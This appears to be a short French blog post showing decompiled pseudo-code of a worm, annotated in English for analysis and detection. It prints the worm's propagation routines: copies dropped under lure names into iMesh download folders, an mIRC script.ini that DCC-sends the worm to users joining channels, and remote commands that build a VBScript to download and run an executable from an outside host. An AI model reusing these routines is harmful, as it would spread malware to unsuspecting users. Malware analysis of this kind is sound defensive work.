La Bête étant écrite en C, ça donne une occasion de s'amuser avec RecStudio.
Le pseudo-code source obtenu est intéressant ; quelques extraits :
Propagation iMesh
// RecStudio pseudo-code, not compilable C: `esp = esp - N` is a stack
// adjustment and `(save) X` is an argument pushed for the call that follows.
// Backslashes in string literals appear to have been stripped by the page
// extraction ("SOFTWAREiMeshClient" is presumably SOFTWARE\iMesh\Client).
// The enclosing function's start is outside this excerpt.
//
// Propagation through the iMesh peer-to-peer download folder: the sample
// reads the client's download directory from the registry and drops copies
// of a file there under lure names. Detection artifacts visible here: a read
// of the HKLM key below, and the eight file names below appearing in that
// directory.
esp = esp - 0xc;
// -2147483646 == 0x80000002 == HKEY_LOCAL_MACHINE; 131097 == 0x20019 == KEY_READ.
RegOpenKeyExA(-2147483646, "SOFTWAREiMeshClient", 0, 131097, & Vfffffff4);
esp = esp - 8;
// Reads the "DownloadsLocation" value into Vfffff5e8 (length in Vfffff4e4).
// Neither registry call's return value is checked, so Vfffff5e8 may be left
// unset when the key or value is absent.
RegQueryValueExA(Vfffffff4, "DownloadsLocation", 0, 0, & Vfffff5e8, & Vfffff4e4);
esp = esp - 0xc;
RegCloseKey(Vfffffff4);
esp = esp - 0xc;
// Downloads path pushed for L004071D0 (the `esp + 0x10` below is the stack
// cleanup the decompiler has placed before the call it belongs to).
(save) & Vfffff5e8;
esp = esp + 0x10;
// L004071D0 is an unresolved internal routine taking a path; presumably a
// "directory exists" check — not shown here, confirm.
Vfffffff0 = L004071D0();
if(Vfffffff0 != 0) {
// Each pair below: sprintf builds "<downloads dir><lure name>" in Vfffff6e8
// (the pushed & Vfffff5e8 is the %s argument), then CopyFileA copies
// Vfffffee8 to that path. What Vfffffee8 holds is not visible in this
// excerpt; the mIRC routine uses the same pattern with the sample's own
// module path. bFailIfExists == 0, so existing files are overwritten.
// sprintf writes into a fixed stack buffer with no bound.
esp = esp - 4;
(save) & Vfffff5e8;
sprintf( & Vfffff6e8, "%ssasser.doc.exe");
esp = esp - 4;
CopyFileA( & Vfffffee8, & Vfffff6e8, 0);
esp = esp - 4;
(save) & Vfffff5e8;
sprintf( & Vfffff6e8, "%sMydoom.b Source.doc.exe");
esp = esp - 4;
CopyFileA( & Vfffffee8, & Vfffff6e8, 0);
esp = esp - 4;
(save) & Vfffff5e8;
sprintf( & Vfffff6e8, "%sSober Source.doc.exe");
esp = esp - 4;
CopyFileA( & Vfffffee8, & Vfffff6e8, 0);
esp = esp - 4;
(save) & Vfffff5e8;
sprintf( & Vfffff6e8, "%sJalabed Source.doc.exe");
esp = esp - 4;
CopyFileA( & Vfffffee8, & Vfffff6e8, 0);
esp = esp - 4;
(save) & Vfffff5e8;
sprintf( & Vfffff6e8, "%sJokes.doc.exe");
esp = esp - 4;
CopyFileA( & Vfffffee8, & Vfffff6e8, 0);
esp = esp - 4;
(save) & Vfffff5e8;
sprintf( & Vfffff6e8, "%sLovsan Source.doc.exe");
esp = esp - 4;
CopyFileA( & Vfffffee8, & Vfffff6e8, 0);
esp = esp - 4;
(save) & Vfffff5e8;
// "Writting" is misspelled in the sample itself; useful as an exact-match artifact.
sprintf( & Vfffff6e8, "%sWorm Writting Tutorial.doc.exe");
esp = esp - 4;
CopyFileA( & Vfffffee8, & Vfffff6e8, 0);
esp = esp - 4;
(save) & Vfffff5e8;
sprintf( & Vfffff6e8, "%sFizzer Source.doc.exe");
esp = esp - 4;
CopyFileA( & Vfffffee8, & Vfffff6e8, 0);
}
Bricolage avec Mirc
// RecStudio pseudo-code, not compilable C: `esp = esp - N` is a stack
// adjustment and `(save) X` is an argument pushed for the call that follows.
// The trailing "n" in the fprintf strings is presumably "\n" with the
// backslash lost by the page extraction (likewise "C:mirc" is presumably
// C:\mirc).
//
// Drops a copy of the running executable into the Windows directory under a
// lure name, then — when the L004071D0 check on "C:mirc" passes — replaces
// script.ini in that directory with an on-JOIN handler that offers the
// dropped file to every user joining a channel. Detection artifacts: the
// "Link for new mirc.doc.exe" file in the Windows directory and a script.ini
// whose section header is the misspelled "[scritp]" (typo is in the sample).
// Always returns 0.
L004017F8()
{
/* unknown */ void Vfffffbe8;   // Windows directory (0x100 bytes requested)
CHAR Vfffffce8;                 // path of the running module (0x100 bytes requested)
char Vfffffde8;                 // destination path of the dropped copy
/* unknown */ void Vfffffff0;   // result of L004071D0("C:mirc")
struct _IO_FILE * Vfffffff4;    // script.ini stream
esp = esp - 4;
(save)0x100;
(save) & Vfffffce8;
// GetModuleFileNameA(NULL, Vfffffce8, 0x100): path of the running executable.
GetModuleFileNameA(0);
esp = esp - 8;
(save)0x100;
eax = & Vfffffbe8;
GetWindowsDirectoryA(eax);
esp = esp - 4;
(save) & Vfffffbe8;
// Builds "<windir>Link for new mirc.doc.exe" (the pushed & Vfffffbe8 is the
// %s argument); unbounded sprintf into a fixed stack buffer.
sprintf( & Vfffffde8, "%sLink for new mirc.doc.exe");
esp = esp - 4;
// Copies the sample's own file to that path; bFailIfExists == 0 overwrites.
CopyFileA( & Vfffffce8, & Vfffffde8, 0);
esp = esp - 0xc;
(save)"C:mirc";
// Unresolved internal routine, called here with the mIRC directory and in the
// iMesh code with the downloads directory; presumably a "directory exists"
// check — not shown here, confirm.
L004071D0();
esp = esp + 0x10;
Vfffffff0 = eax;
if(Vfffffff0 != 0) {
esp = esp - 8;
// "w+" truncates, so an existing script.ini is replaced outright. The return
// value is not checked; a NULL FILE* would be passed straight to fprintf.
Vfffffff4 = fopen("C:mircscript.ini", "w+");
esp = esp - 8;
// Section header misspelled in the sample ("[scritp]" rather than "[script]").
fprintf(Vfffffff4, "[scritp]n");
esp = esp - 8;
// Handler runs when any nick joins any channel ...
fprintf(Vfffffff4, "n0=on 1:JOIN:#:{n");
esp = esp - 8;
// ... but stops when the joining nick is the local user.
fprintf(Vfffffff4, "n1= /if ( $nick == $me ) { halt }n");
esp = esp - 8;
fprintf(Vfffffff4, "n2= /msg $nick Here you have the link to the new mircn");
esp = esp - 4;
(save) & Vfffffde8;
// %s is the dropped-copy path built above, DCC-sent to the joining nick.
fprintf(Vfffffff4, "n3= /.dcc send $nick %sn");
esp = esp - 8;
fprintf(Vfffffff4, "n4=}");
esp = esp - 0xc;
fclose(Vfffffff4);
}
return 0;
}
Génération de VBScript
// RecStudio pseudo-code fragment; the enclosing function begins and ends
// outside this excerpt. `esp = esp - N` is a stack adjustment and `(save) X`
// an argument pushed for the call that follows. Backslashes appear stripped
// by the page extraction: the trailing "n" is presumably "\n" and
// "c:khaled.vbs" presumably c:\khaled.vbs.
//
// Each strcpy/send pair copies one command line into the stack buffer at
// ebp-110056 and sends it on the socket held at *(ebp-0x10) — apparently a
// remote command interpreter reached earlier, outside this excerpt. The
// lines assemble a VBScript on the remote host that fetches a second-stage
// executable over HTTP (Microsoft.XMLHTTP), writes it out with ADODB.Stream
// and runs it. Host-side artifacts: c:\khaled.vbs and c:\webdavbykh.exe;
// the download host is shown partially masked on the page.
//
// The send length is the constant 10000 regardless of the string's length,
// so every send also transmits whatever stale stack data follows the NUL
// terminator — a usable on-the-wire fingerprint of this sample.
esp = esp - 8;
strcpy(ebp + -110056, "echo Dim DataBin >c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo Dim HTTPGET >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
// Download URL of the second stage (as printed on the page).
strcpy(ebp + -110056, "echo HTTPGET.Open "GET", "http://webdav.yy.xxxxx.de/wormbykhaled.exe", False >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo HTTPGET.Send >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo DataBin = HTTPGET.ResponseBody >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo Const adTypeBinary=1 >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo Const adSaveCreateOverWrite=2 >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo Dim SendBinary >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo Set SendBinary = CreateObject("ADODB.Stream") >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo SendBinary.Type = adTypeBinary >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo SendBinary.Open >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo SendBinary.Write DataBin >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
// Drop path of the downloaded executable; adSaveCreateOverWrite replaces an
// existing file.
strcpy(ebp + -110056, "echo SendBinary.SaveToFile "c:webdavbykh.exe", adSaveCreateOverWrite >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
// Runs the assembled script on the remote host.
strcpy(ebp + -110056, "start C:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 0xc;
(save)3;
// _sleep(3) before launching the download result; time unit not
// determinable from this excerpt.
_sleep();
esp = esp + 0x10;
esp = esp - 8;
// Runs the downloaded executable.
strcpy(ebp + -110056, "start C:webdavbykh.exen");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
// Zeroes a local whose role lies outside this excerpt.
*(ebp + -110488) = 0;
Bon, pas eu le temps d'aller plus loin, mais une fois encore RecStudio est magique !
YOP